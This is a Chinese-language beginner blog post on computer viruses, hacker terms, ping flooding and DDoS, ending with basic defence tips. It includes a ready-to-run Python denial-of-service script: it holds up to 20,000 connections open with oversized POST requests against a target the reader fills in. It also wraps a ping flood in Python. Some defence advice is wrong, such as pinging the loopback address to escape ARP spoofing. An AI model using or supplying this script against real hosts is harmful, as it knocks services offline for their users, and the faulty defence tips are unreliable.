信息安全攻防基础

[toc]

序言

先明确本篇文章旨在让有意学习者了解计算机病毒入侵的手段和防护办法,请各位学习者自觉遵循中华人民共和国相关法律法规。 其次,如果认为“黑客是坏蛋",建议先看看黑客骇客谁是坏蛋?

其实关于入侵技术的文章一直都是比较少,可能是因为现在国家企业对网络安全越来越重视了,越来越多的技术人员从事网络安全防护,病毒入侵也不似以前那么猖狂。

计算机病毒介绍

概念

狭义上的计算机病毒是指能够进行自我传播,需要用户敢于来触发执行的破坏性程序或代码。

计算机病毒分类

  • 按照计算机病毒攻击的系统分类:
    (1)攻击Windows系统的病毒
    (2)攻击DOS系统的病毒
    (3)攻击UNIX系统的病毒
    (4)攻击Operating System/2系统的病毒

  • 按照计算机病毒的链结方式分类
    (1)源码型病毒
    (2)嵌入型病毒
    (3)外壳型病毒
    (4)操作系统型病毒

  • 按照计算机病毒的破坏情况分类
    (1)良性计算机病毒
    (2)恶性计算机病毒
    (3)引导型计算机病毒

  • 按照计算机病毒的传播媒介分类
    (1)单机病毒
    (2)网络病毒

黑客术语

蠕虫:一段能进行自我传播,无须用户干预而可以自动触发执行额破坏性程序或代码。

木马:是指附着在应用程序上或单独存在的一些恶意程序,他可以利用网络远程响应网络的另一端的控制程序的控制命令,实现对被植入木马的目标计算机的控制或者窃取感染木马程序 的计算机上的机密资料。

后门:允许攻击者绕过系统中常规安全控制机制的程序,它按照攻击者自己的意图提供通道。

僵尸(bot):是指实现恶意控制功能的程序代码。大量被植入僵尸程序的电脑通过僵尸控制服务器便可以形成僵尸网络。

rootkit:室友很多有用的小程序组成的工具包,使得攻击者能够保持访问计算机上具有最高权限的用户“root”。 换言之 ,rootkit是可以持久的,无法被检测地存在于计算机的一组程序或代码。

间谍软件:以主动收集用户个人信息,相关机密文件或隐私数据为主,收集到的数据会主动传送到指定服务器 。

流氓软件:具有一定的实用价值但具备电脑病毒和黑客软件的部分特征的软件

exploit:精心设计的用于利用特定漏洞以及对目标系统进行控制的程序

提权:操作系统低权限的账户将自己提升为管理员权限使用的方法。

后门:黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口”。

跳板:使用肉鸡IP来实施攻击的其他目标,以便更好的隐蔽自己的身份信息。

旁站入侵:即同服务器下的网站入侵,入侵之后可以通过提权跨目录手段拿到目标网站的权限。(常见的工具有:WebRobot、御剑、明小子和web在线查询等) 。

更多黑客术语查看

搭建环境

  • 首先,安装Python
    相信这一步大家都轻车熟路的啦,在这里略过……
    (PS:以下演示环境为Python3.7)
    安装Python3.7
  • 安装虚拟机并安装Windows系统镜像
    攻击别人的电脑或网站犯法,所以自己搭建个虚拟机吧(说机不说吧,文明你我他)òᆺó
    安装VMware
    安装VitrualBox
    以上安装虚拟机方式任选其一,安装完成记得下载iso文件安装系统

ping网络堵塞

首先,需要获取攻击的ip地址(这个是最基本的,连没有ip地址都不知道,就啥也搞不了)。
Windows系统获得本机的ip地址只需要打开命令提示符(cmd)并输入ipconfig就可以了。但是攻击的时候需要目标的ip地址,这个时候就需要抓包工具啦。
常用的几款抓包工具 ,找一个你觉得顺眼的工具用一下吧!(这里说一下,黑客的软件,不能随便下载,指不准在软件里做了手脚打包发出来的,所以尽量还是去可靠的渠道下载黑客工具吧,例如官网~)
如果是获取网站ip地址,直接打开cmd,ping一下域名就行了。
ping baidu.com
<center>如图,得到的 就是ip地址</center>
在这里来个补充,ping一下ip,原理上是本机给对方ip地址发送请求,如果对方ip收到请求那么就给本机返回数据包~在这过程中对方ip地址对应的服务器(电脑)

试想,如果一直发送会不会造成网络堵塞?
因此有了以下操作:

PING -t ip
注:这样可以PING指定的IP到永远,除非你停止它。很多初级黑客喜欢用这个参数来进行网络堵塞的攻击。
PING -l 大小 ip
注:这样可以设置发送包大小
PING -n 次数 ip
注:这样可以设置次数。

PING -n 10 -l 10 baidu.com

利用ping造成网络堵塞的Python3.7代码

    import os
    import socket
    import time
    ip = input("请输入IP:")
    os.system("ping -t -l 50 " + ip)

分布式拒绝服务攻击(DDos)

分布式拒绝服务攻击可以使很多的计算机在同一时间遭受到攻击,是一种网络攻击手法,其目的在于使目标电脑的网络或系统资源耗尽,使服务暂时中断或停止,导致其正常用户无法访问。

来看看Python3.7的DDos代码

    import socket
    import time
    import threading
    #Pressure Test,ddos tool

    #---------------------------
    MAX_CONN=20000
    PORT=80
    HOST=""#在双引号里输入对方IP或域名,要保证他联网了或开机了.
    PAGE="/index.php"
    #---------------------------

    buf=("POST %s HTTP/1.1\r\n"
    "Host: %s\r\n"
    "Content-Length: 10000000\r\n"
    "Cookie: dklkt_dos_test\r\n"
    "\r\n" % (PAGE,HOST))

    socks=[]

    def conn_thread():
        global socks
        for i in range(0,MAX_CONN):
            s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            try:
                s.connect((HOST,PORT))
                s.send(buf.encode())
                print ("Send buf OK!,conn=%d\n"%i)
                socks.append(s)
            except Exception as ex:
                print ("Could not connect to server or send error:%s"%ex)
                time.sleep(0.1)
    #end def

    def send_thread():
        global socks
        while True:
            for s in socks:
                try:
                    s.send("f".encode())
                    #print "send OK!"
                except Exception as ex:
                    print ("Send Exception:%s\n"%ex)
                    socks.remove(s)
                    s.close()
            time.sleep(0.1)
    #end def

    conn_th=threading.Thread(target=conn_thread,args=())
    send_th=threading.Thread(target=send_thread,args=())

    conn_th.start()
    send_th.start()

防护

预防

最简单最基础的网络攻击讲完了,那么接下来该学学学习如何保护自己的计算机啦(*σ´∀`)σ

  • 如果是Win10,打开自带的Defender
    傻瓜式设置,按照系统的提示把防火墙什么的都打开

  • 无特殊情况不装360安全卫士,并且卸载360的所有软件

  • 尽量不要安装破解软件

  • 看到明显的恶意捆绑软件不要安装,以及defender提示病毒的软件也尽量不要安装。

  • 不进不明不网站,不收奇怪邮件。下载完压缩包文件后先进行病毒扫描

  • 关闭不必要的端口

如何应对攻击

接下来,我们来看看如何应对攻击

应对DDoS攻击
其实目前对上DDoS攻击都是个很烦事情。
要想完全不受DDos攻击的危害——断网。
打开cmd窗口,输入net stop Service,关闭Windows网络服务。
关闭后,即可免遭危害。(滑稽)

应对DNS欺骗
重启网络路由,将浏览器全部还原为原设置。

应对ARP欺骗
重启网络路由,将浏览器(需要网络的软件)全部还原为默认设置。接着打开cmd窗口,输入arp -a,如果显示:没有ARP缓存表,说明你还在遭遇此攻击,否则你就已脱离了危险。接着,输入ping -t -l 10 127.0.0.1 ,不停地PING轮回IP,使其防止网络堵塞,还可能会摆脱危险。接着,打开资源监视器,找到网络,看看是谁在不断给你发送ARP数据包。找到后,立即找专业人员进行询问和修理,并且将此IP提交给专业人员。

参考资料

[1] Python3.7黑帽编程——病毒篇(基础篇):tiantian520_tt
[2] 计算机病毒类型:发烧友学院
[3]各类计算机病毒介绍:薛定谔的小橙子
[4] Fiddler抓包工具总结:代码改变世界
[5]常用的几款抓包工具:白清羽
[6] 黑客的基础知识:残念( ̄▽ ̄)/王司徒
[7]计算机网络安全——保护自己的计算机(基础)

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,496评论 6 501
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,407评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,632评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,180评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,198评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,165评论 1 299
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,052评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,910评论 0 274
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,324评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,542评论 2 332
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,711评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,424评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,017评论 3 326
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,668评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,823评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,722评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,611评论 2 353